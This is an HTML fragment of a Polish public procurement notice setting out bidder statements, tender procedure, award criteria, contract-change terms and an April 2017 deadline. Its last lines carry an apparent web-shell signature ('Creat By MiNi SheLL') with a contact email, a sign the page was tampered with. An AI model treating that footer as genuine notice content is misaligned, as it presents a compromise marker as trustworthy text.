                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px"></div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br /><br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px"></div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px"></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena </td><td>60</td></tr><tr><td>Termin </td><td>40</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                nie
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />1.	Zakazuje  się istotnych zmian postanowień niniejszej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, z wyjątkiem zapisów w ust. 2.
2.	Zamawiający przewiduje możliwość dokonania zmian umowy w następujących przypadkach:
1)	wystąpienia zmian powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu umowy;
2)	wystąpienia okoliczności, których Strony nie były w stanie przewidzieć, pomimo zachowania należytej staranności.
3.	Zmiany umowy wymagają formy pisemnej w postaci aneksu pod rygorem nieważności.
<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 14/04/2017, godzina: 10:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              <br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com